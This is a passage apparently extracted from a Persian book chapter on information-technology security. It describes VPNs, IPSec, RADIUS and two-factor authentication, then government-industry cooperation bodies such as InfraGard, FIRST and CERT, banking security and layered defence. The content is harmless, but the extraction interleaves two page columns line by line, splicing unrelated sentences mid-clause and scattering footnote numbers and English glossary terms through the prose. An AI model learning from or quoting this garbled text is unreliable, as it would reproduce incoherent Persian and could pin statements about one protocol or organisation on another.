ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻣﺬﻛﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ،ﺑﺎﻳﺪ VPNﺭﺍﻩ ﺍﻧـﺪﺍﺯﻱ ﻛﻨﻴـﺪ، ﺩﺭ ﻳﻚ ﻃﺮﻑ ﻭ ﺷﺒﻜﺔ ﻣـﻮﺭﺩ ﺍﻋﺘﻤـﺎﺩ ﺩﺍﺧﻠـﻲ ﺩﺭ ﻃـﺮﻑ
ﺑﻄﻮﺭﻳﻜﻪ ﻫﻤﺔ gatewayﻫﺎ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﺍﻳـﻦ ﺩﻳﮕﺮ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ .ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ
VPNﺑﺎﺷﻨﺪ ﻭ ﻫﺮ ﻛﺎﺭﺑﺮ ﻫﻨﮕﺎﻡ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﻣـﻮﺭﺩ ﻣﺜــﻞ IPSecﻭ ﺳــﺎﻳﺮ ﻣﻜﺎﻧﻴﺰﻣﻬــﺎﻱ VPNﺍﺳــﺘﻔﺎﺩﻩ
ﺍﻃﻤﻴﻨﺎﻥ ،ﺍﺯ ﺍﻳﻦ ﻣﻜـﺎﻧﻴﺰﻡ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﺪ .ﺍﺳﺎﺳـﹰﺎ VPNﻳـﻚ ﻣﻲﻛﻨﺪ ﻭ ﺗﻨﻬﺎ ﭘﺲ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻃﺮﻳﻖ
ﺍﺗﺼﺎﻝ ﺧﺼﻮﺻﻲ ﻣﻴﺎﻥ ﺩﻭ ﺩﺳﺘﮕﺎﻩ ﺍﺳﺖ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺁﻧﻬﺎ ﺑﻪ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﺮﺩ .ﺑـﺮﺍﻱ ﻣﺤـﺪﻭﺩ
ﺭﺍ ﺩﺭ ﻳﻚ ﺷـﺒﻜﺔ ﻋﻤـﻮﻣﻲ ﻭ ﺑـﻪﺍﺷـﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻪﺷـﺪﻩ ﻣﺜـﻞ
ﺍﻳﻨﺘﺮﻧﺖ ﺑـﺼﻮﺭﺕ ﺍﻣـﻦ ﺍﻧﺘﻘـﺎﻝ ﻣـﻲﺩﻫـﺪ .ﻓﻨـﺎﻭﺭﻱ VPNﺑـﻪ
210 Two Factor Authentication
ﺳﺎﺯﻣﺎﻥ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺧﺪﻣﺎﺕ ﺷﺒﻜﺔ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ Bateman ۲۱۱ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﺪ ﺍﺯ ﺭﻭﺷﻲ ﻛﻪ ﺍﻭ ﺁﻧـﺮﺍ e-thenticator
ﺭﺍﻩ ﺩﻭﺭ ،ﻭﺍﺣﺪﻫﺎ ،ﻭ ﺷﺮﻛﺘﻬﺎﻱ ﻫﻤﻜﺎﺭ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻣﻲﻧﺎﻣﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﻢ ،ﻛﻪ ﺩﺭ ﺁﻥ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﻣﺨﺼﻮﺹ ،ﺍﺛﺮ ﺍﻧﮕﺸﺖ
ﺷﺴﺖ ﺭﺍ ﺩﺭ ﻳﻚ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ.
ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﺩﻫﺪ .ﺑﻪ ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ VPNﺍﻳﻨﺘﺮﻧﺖ 212 Remote Authentication Dial-In User Service
ﺭﺍ ﺑﻪ ﻳﻚ ﺷﺒﻜﺔ ﺷﺒﻴﻪﺳﺎﺯﻱﺷﺪﺓ ﺧـﺼﻮﺻﻲ ٢١٦WANﺗﺒـﺪﻳﻞ RADIUS ۲۱۳ﻳﺎ ﻫﻤﺎﻥ "ﺳﺮﻭﻳﺲ ﺗﻠﻔﻨﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍﻩ ﺩﻭﺭ ﻛﺎﺭﺑﺮ"،
ﻳﻚ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺳﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺑﺮﺭﺳـﻲ
ﻣﻲﻛﻨﺪ VPN .ﻫﻤﭽﻨﻴﻦ ﺑـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍﻩ ﺩﻭﺭ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﺭﺍ
ﻣﻲﻛﻨﺪ ﻭ ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻗﺮﺍﺭ ﺩﺍﺩ ﺑﻪ ﻛﺎﺭﺑﺮ ﺍﺟﺎﺯﺓ
ﻣﻲﺩﻫﺪ ﻛـﻪ ﺑﺘﻮﺍﻧﻨـﺪ ﺑـﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﺷـﺮﻛﺖ ﺧـﻮﺩ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ﺭﺍ ﻣﻲﺩﻫﺪ .ﻗﺴﻤﺘﻲ ﺍﺯ ﺁﻧﭽـﻪ RADIUS
ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ. ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﻓﺮﺍﻫﻢ ﻛﻨﺪ ،ﺍﺭﺗﺒﺎﻁ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻣﻴﺎﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ-
ﻫــﺎﻱ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ RADIUSﺍﺳــﺖ .ﺷــﺒﻜﻪﻫــﺎﻱ
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﺷـﺒﻜﺔ ﺍﺭﺗﺒـﺎﻃﻲ ﻭﺳـﻴﻊ ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ )VPNﻫـﺎ( ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﻣﺸﺎﺑﻪ ﻛﺎﺭ ﻣـﻲﻛﻨﻨـﺪ ،ﺍﻣـﺎ
ﺧﺼﻮﺻﻲ ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺑـﺮ ﺩﻭ ﻣـﺎﻧﻊ ﺍﺻـﻠﻲ ﻓـﺎﺋﻖ ﺁﻳﻨـﺪ .ﺍﻭﻝ ﺑﺠﺎﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﻣﻴﺰﺑﺎﻥ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺷﺒﻜﻪ ،ﻣﻴﺎﻥ ﺩﻭ ﺷـﺒﻜﻪ
ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﻧﺪ .ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﺍﻳﻨﻜﻪ ﺷﺒﻜﻪﻫﺎ ﻏﺎﻟﺒﹰﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺍﺭﺗﺒـﺎﻁ ﺷﺪ ﻭ ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ RADIUSﺑﻪ ﺷـﺒﻜﺔ ﺩﺍﺧﻠـﻲ ﻣﺘـﺼﻞ
ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨﺪ ،ﺍﻣﺎ VPNﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻋﺒﻮﺭ ﭘﺮﻭﺗﻜﻠﻬﺎﻳﻲ ﻏﻴﺮ ﺍﺯ ﮔﺸﺖ ،ﺑﮕﻮﻧﻪﺍﻱ ﻋﻤﻞ ﻣﻲﻛﻨﺪ ﻛـﻪ ﮔـﻮﻳﻲ ﺍﺯ ﻧﻈـﺮ ﻓﻴﺰﻳﻜـﻲ ﺩﺭ ﻛﻨـﺎﺭ
IPﺍﺯ ﻳﻚ ﺷﺒﻜﻪ ﺑﻪ ﺷﺒﻜﺔ ﺩﻳﮕﺮ ﻓﺮﺍﻫﻢ ﻣـﻲﺳـﺎﺯﺩ .ﺩﻭﻡ ﺍﻳﻨﻜـﻪ ﺷــﺒﻜﻪ ﻭ ﻣﺘــﺼﻞ ﺑــﻪ ﺁﻥ ﺍﺳــﺖ .ﺑــﻪ ﻋﺒــﺎﺭﺕ ﺩﻳﮕــﺮ ،ﺭﻣﺰﮔــﺬﺍﺭﻱ
ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ RADIUSﺗﻨﻬــﺎ ﻣﻴــﺎﻥ ﺁﻥ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩ ﻭ
ﺑﺴﺘﻪﻫﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺼﻮﺭﺕ ﻣـﺘﻦﺳـﺎﺩﻩ ﺍﻧﺘﻘـﺎﻝ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﻭ ﻧﻪ ﺩﺭ ﺗﻤﺎﻡ ﺷﺒﻜﻪ.
،Rick Fleming ۲۱۴ﻗﺎﺋﻢ ﻣﻘﺎﻡ ﺭﺋﻴﺲ ﺩﺍﻳﺮﺓ ﺍﻣﻨﻴﺖ ﺷﺮﻛﺖ Digital
Defense
216 Wide Area Network 215 Dual Homed
٢١٣ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
217 Tunneling
۲۱۸ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ IETFﺩﺭﺣﺎﻝ ﺍﺻﻼﺡ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ VPNﺍﺳـﺖ ﺗـﺎ
IPSecﺭﺍ ﺍﻳﻤﻦﺗﺮ ﻭ ﻧﻴﺰ ﺑﺎ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺎﻫﻮﺍﺭﻩﺍﻱ ﺳﺎﺯﮔﺎﺭ ﻛﻨﺪ.
219 Point-to-Point Protocol
220 Link Layer
221 Point-to-Point Tunneling
222 Layer 2 Tunneling Protocol
۲۲۳ﻣﻘﺎﻟﺔ Karen Bannasﺑﺎ ﻋﻨﻮﺍﻥ " "Safe Passageﺩﺭ ﻣﺠﻠﺔ
،PC Magazineﻫﻔــﺖ ﺷــﺮﻛﺖ ﺍﺭﺍﺋــﻪﺩﻫﻨــﺪﺓ VPNﺭﺍ ﺑــﺮﺍﻱ
ﻣﺤﺼﻮﻻﺕ ﻣﻨﺎﺳﺐ ﺟﻬﺖ ﻛﺎﺭﺑﺮﺩ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺘﻮﺳﻂ ﺑـﺎ ﺑﻮﺩﺟـﻪﺍﻱ
ﺣﺪﻭﺩ ﺩﻩ ﻫﺰﺍﺭ ﺩﻻﺭ ﻛﻪ ﺑﻪ VPNﺑﺮﺍﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﺩﻓﺘـﺮ ﻣﺮﻛـﺰﻱ ﻭ
ﺷﻌﺒﻪﻫﺎ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ:
http://www.pcmag.com/
print_article/0,3048,a%3D12352,00.asp
٢١٥ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻣﻤﻴﺰﻱ ﻭ ﺁﺯﻣﻮﻥ ﻓﺮﺁﻳﻨﺪﻫﺎ .ﺑﺮﺍﻱ ﺗـﺴﺮﻳﻊ ﺭﻓـﻊ ﻭ ﺭﺟـﻮﻉ • ﺍﻋﺘﺒﺎﺭ ﺍﻣﻀﺎﻫﺎ ﻭ ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛ •
ﻛﺎﺭﻫﺎ ﺑﺎﻳﺪ ﻫﻤﻜﺎﺭﻱ ﻭﺳﻴﻌﻲ ﻣﻴﺎﻥ ﻫﻤﺔ ﻃﺮﻓﻬﺎﻱ ﺩﺭﮔﻴـﺮ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ،ﻭ ﺍﻋـﻼﻡ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ •
ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺎﻧﻜﻬﺎﻱ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘـﺎ ﺩﺍﺭﺍﻱ ﺍﺟﺮﺍﻳﻲ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻳﻤﻦ ﺍﺯ ﺍﻃﻼﻋﺎﺕ؛
ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻫﺎﻳﻲ ﺩﺭ Antiguaﻫــﺴﺘﻨﺪ .ﺍﮔــﺮ ﺍﻳــﻦ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻣــﻦ ﭘﺮﺩﺍﺧــﺖ ﻣﻴــﺎﻥ ﺑﺎﻧﻜﻬــﺎ ﺑﺨــﺼﻮﺹ •
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻓﺘﻨﺪ ،ﺑﺎﻧﻚ ﻫﻢ ﻗﺎﺩﺭ ﺑﻪ ﺍﺭﺍﺋـﻪ ﺑﺎﻧﻜﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛
ﺧﺪﻣﺎﺕ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ ،ﻭ ﺍﮔﺮ ﻫﻤﻜﺎﺭﻳﻬـﺎﻱ ﻓﺮﺍﺑﺨـﺸﻲ ﺑـﺎ ﭘﻮﻟــﺸﻮﻳﻲ ﻭ ﺳــﻄﺢ ﻫﻤﻜــﺎﺭﻱ ﺑــﻴﻦ ﺍﻟﻤﻠﻠــﻲ ﻛــﻪ ﺑــﺮﺍﻱ •
ﻣﺸﻜﻞ ﻣﻮﺍﺟﻪ ﺷﻮﺩ ،ﺍﻗﺪﺍﻣﺎﺕ ﻓﻮﺭﻳﺘﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨـﻪ ﺑـﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺁﻥ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ؛ ﻭ
ﺗﻌﻮﻳﻖ ﻣﻲﺍﻓﺘﺪ. ﺗﻮﺳﻌﻪ ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ،ﻛﻪ ﻣﻘﻮﻟﺔ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ •
ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺠﺮﻣﺎﻧﻪ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ.
ﻫﻤﻜــﺎﺭﻱ ﺩﻭﻟــﺖ ﻭ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ .ﻣﻤﻜــﻦ ﺍﺳــﺖ •
ﻣﺨﺎﻃﺮﺍﺗﻲ ﻛﻪ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ ﺟﻨﺒﺔ ﺣﻴﺜﻴﺘﻲ ﺩﺍﺭﻧﺪ ﻣﻨﺠـﺮ ﺍﺟﺮﺍﻱ ﺻﺤﻴﺢ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻧﻴﺎﺯﻣﻨﺪ ﭘﺬﻳﺮﺵ ﺿﻮﺍﺑﻂ ﺗﻮﺳﻂ ﻋﻤﻮﻡ،
ﺑﻪ ﺧﻮﺩﺩﺍﺭﻱ ﺍﺯ ﮔﺰﺍﺭﺵ ﻛﺮﺩﻥ ﺣﻮﺍﺩﺙ ﺷـﻮﻧﺪ .ﺩﺭﻧﺘﻴﺠـﻪ ﺩﺳﺖ ﻛﺸﻴﺪﻥ ﺍﺯ ﺗﻜـﺮﻭﻱ ﻭ ﻳﻜـﻪﺗـﺎﺯﻱ ،ﻭ ﺑـﺎﻻ ﺑـﻮﺩﻥ ﺩﺍﻧـﺶ
ﺑﺮﮔﺰﺍﺭﻱ ﻣﻴﺰﮔﺮﺩﻫـﺎﻳﻲ ﺑـﺮﺍﻱ ﺑﺤـﺚ ﭘﻴﺮﺍﻣـﻮﻥ ﺿـﻮﺍﺑﻂ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﺍﺳﺖ .ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﺯ ﻗﺒﻞ ﻣﻴـﺎﻥ ﺻـﻨﺎﻳﻊ ﻣﺘﻔـﺎﻭﺕ ﺩﺭ
ﻗﺎﻧﻮﻧﻲ ﻭ ﺗﻬﺪﻳـﺪﻫﺎﻱ ﻣﻮﺟـﻮﺩ ﺿـﺮﻭﺭﻱ ﺍﺳـﺖ .ﺑﻌﻨـﻮﺍﻥ ﺳﻄﻮﺡ ﻣﺨﺘﻠﻒ ﻫﻤﻜـﺎﺭﻱ ﻭﺟـﻮﺩ ﺩﺍﺷـﺘﻪ ،ﺍﻣﻨﻴـﺖ ﭘﺮﺩﺍﺧﺘﻬـﺎﻱ
ﻣﺜﺎﻟﻬــﺎﻳﻲ ﺍﺯ ﻫﻤﻜــﺎﺭﻱ ﻭ ﺷــﺮﺍﻛﺖ ﻋﻤﻠﻴــﺎﺗﻲ ﺑﺨــﺶ ﻼ ﺑـﻪ ﺗـﺪﺍﺧﻞ ﺑﺨـﺸﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﻣﻮﺍﺭﺩﻱ ﺍﺳﺖ ﻛﻪ ﻛـﺎﻣ ﹰ
ﺧﺼﻮﺻﻲ ﻭ ﺩﻭﻟﺖ ﻣـﻲﺗـﻮﺍﻥ ﺍﺯ ﻣﺆﺳـﺴﺔ InfraGard ﻣﺨﺎﺑﺮﺍﺕ ﻭ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻧﺠﺎﻣﻴﺪﻩ ﺍﺳﺖ .ﺻﻨﻌﺖ ﺑﺎﻧﻜﻲ ﺷﺎﺧﺼﻬﺎﻱ
NIPCﻧﺎﻡ ﺑﺮﺩ ،ﻛـﻪ ﻣﺤـﺼﻮﻝ ﻳـﻚ ﻫﻤﻜـﺎﺭﻱ ﻣﻴـﺎﻥ ﺍﻣﻨﻴﺖ ﻭ ﺻﺤﺖ ﺭﺍ ﺗﺤﺖ ﻋﻨﻮﺍﻥ "ﺩﺳﺘﺮﺳﻲ ﺑـﺪﻭﻥ ﺗﺒﻌـﻴﺾ ﺑـﻪ
ﻲ ﺻﻨﻌﺖ ﻭ ﺩﻭﻟﺖ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺑـﻮﺩ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻ ﹺ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺳﺎﻟﻢ ﻭ ﺍﻣـﻦ" ﺗﻌﺮﻳـﻒ ﻛـﺮﺩ ،ﻭ ﺍﺯ ﻃـﺮﻑ
ﺗﻮﺳﻂ FBIﻧﻤﺎﻳﻨﺪﮔﻲ ﻣﻲﺷﺪ .ﺷـﻜﻞ ﺩﻳﮕـﺮ ﺍﻳـﻦ ﻧـﻮﻉ ﺩﻳﮕﺮ ﺁﺭﻣﺎﻥ ﺻﻨﻌﺖ ﻣﺨﺎﺑﺮﺍﺕ "ﺩﺳﺘﺮﺳـﻲ ﻫﻤﮕـﺎﻧﻲ ﺑـﺮ ﺍﺳـﺎﺱ
ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﻧﺎﻡ ٢٢٨FIRSTﻣﻴﺎﻥ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﺗﻴﻤﻬـﺎﻱ ﻋﻼﻗــﻪ ﻭ ﺭﻓــﺎﻩ ﻋﻤــﻮﻣﻲ" ﺑــﻮﺩ .ﺍﻳﻨﮕﻮﻧــﻪ ﺗﻌــﺎﺭﻳﻒ ﻣﺘﻔــﺎﻭﺕ ﺍﺯ
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﺔ ﺑﺨـﺶ ﺩﻭﻟﺘـﻲ ،ﺍﻗﺘـﺼﺎﺩﻱ ﻭ ﺩﺍﻧـﺸﮕﺎﻫﻲ "ﺧﺪﻣﺎﺕ ﺍﻣﻦ" ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺍﻳﻤﻦﻛﺮﺩﻥ ﺷﺒﻜﻪﻫﺎ ﻭ ﺩﺭﻧﻈـﺮ
ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻫﺪﺍﻑ FIRSTﺍﻳﺠﺎﺩ ﻫﻤﺎﻫﻨﮕﻲ ﻭ ﮔﺮﻓﺘﻦ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻗﺘـﺼﺎﺩﻱ ﺑـﺼﻮﺭﺕ ﻫﻤﺰﻣـﺎﻥ ،ﺩﭼـﺎﺭ ﻣـﺸﻜﻞ
ﻫﻤﻜﺎﺭﻱ ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ ،ﻭﺍﻛﻨﺶ ﺳـﺮﻳﻊ ﻣﻲﻛﻨﺪ.
ﺑﻪ ﺣﻮﺍﺩﺙ ﺍﻣﻨﻴﺘﻲ ﻭ ﺗـﺮﻭﻳﺞ ﺍﺷـﺘﺮﺍﻙ ﺍﻃﻼﻋـﺎﺕ ﻣﻴـﺎﻥ
ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﺳﻄﻮﺡ ﻭﺳﻴﻊ ﻋﻨـﻮﺍﻥ ﺷـﺪﻩ ﺍﺳـﺖ .ﺍﺯ ﺩﻳﮕـﺮ ﻧﻈﺎﺭﺕ ﻭ ﭘﻴﺸﮕﻴﺮﻱ
ﻣﺜﺎﻟﻬــﺎ ﺩﺭ ﺍﻳــﻦ ﺯﻣﻴﻨــﻪ ﻣــﻲﺗــﻮﺍﻥ ﺑــﻪ ﭘﻴﻤــﺎﻥ ﺍﻣﻨﻴ ـﺖ ﺑﺎ ﻭﺟﻮﺩ ﻣﺸﻜﻼﺕ ﻓﺮﺍﻭﺍﻥ ﭘـﺮﺩﺍﺧﺘﻦ ﺑـﻪ ﻧﻴﺎﺯﻣﻨـﺪﻳﻬﺎﻱ ﺩﻭﮔﺎﻧـﺔ
ﺍﻳﻨﺘﺮﻧﺖ ٢٢٩ﻭ ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ )(CERT ﺍﻣﻨﻴﺖ ﻭ ﺻﺤﺖ ،ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻳـﻚ ﻧﻴـﺎﺯ ﺣﻴـﺎﺗﻲ ﺑـﺮﺍﻱ
ﺍﺷﺎﺭﻩ ﻛﺮﺩ ،ﻛﻪ ﻣﺤﺼﻮﻝ ﻳﻚ ﻫﻤﻜﺎﺭﻱ ﻣـﺸﺘﺮﻙ ﻣﻴـﺎﻥ ﺑﻴﺸﺘﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺳﺖ ﻭ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﻋﻤﻠـﻲ،
ﻲ CERTﺩﺭ ﺩﺍﻧـﺸﮕﺎﻩ Carnegie ﻣﺮﻛﺰ ﺑـﻴﻦﺍﻟﻤﻠﻠـ ﹺ ﻗــﺎﻧﻮﻧﻲ ﻭ ﺣﻴﺜﻴﺘــﻲ ﺩﺭ ﻣﺤــﻴﻂ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ،ﺗــﻼﺵ ﻭ
Mellonﻭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﻏﻴﺮﺩﻭﻟﺘـﻲ ﻫﻤﺎﻫﻨﮕﻲ ﺯﻳﺎﺩﻱ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ .ﻃﺮﺣﻬﺎﻳﻲ ﻛﻪ ﺑـﺮﺍﻱ ﺍﻓـﺰﺍﻳﺶ
ﺍﺳﺖ. ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﻧﺪ:
ﺍﻣﻨﻴــﺖ ﭼﻨﺪﻻﻳــﻪ .ﻣﻬﻤﺘــﺮﻳﻦ ﺭﺍﻫﻜــﺎﺭ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ •
ﺁﻣﻮﺯﺵ ،ﺁﮔـﺎﻫﻲ ﻭ ﻳـﺎﺩﮔﻴﺮﻱ ﻣﻬـﺎﺭﺕ .ﺗﺤﻘﻴـﻖ ﺑﺎﻧـﻚ •
ﺍﻃﻼﻋﺎﺕ ،ﺷﻴﻮﺓ ﭼﻨﺪﻻﻳﻪ ﺍﺳﺖ ﻛـﻪ ﺩﺭ ﺁﻥ ﺍﻳﻤﻨـﻲ ﺗﻨﻬـﺎ ﺟﻬﺎﻧﻲ ﻧﺸﺎﻥ ﻣﻲ ﺩﻫﺪ ﻛﻪ ﺣﺪﻭﺩ %۵۰ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ
ﺗﻮﺳﻂ ﻓﻨﺎﻭﺭﻱ ﺗﺄﻣﻴﻦ ﻧﻤﻲﺷﻮﺩ ،ﺑﻠﻜﻪ ﺍﻓـﺮﺍﺩ ﻭ ﻓﺮﺁﻳﻨـﺪﻫﺎ ﻧﺎﺷﻲ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻫﺴﺘﻨﺪ .ﺍﮔﺮ ﺍﺟﺮﺍﻱ ﻧﺎﺩﺭﺳـﺖ
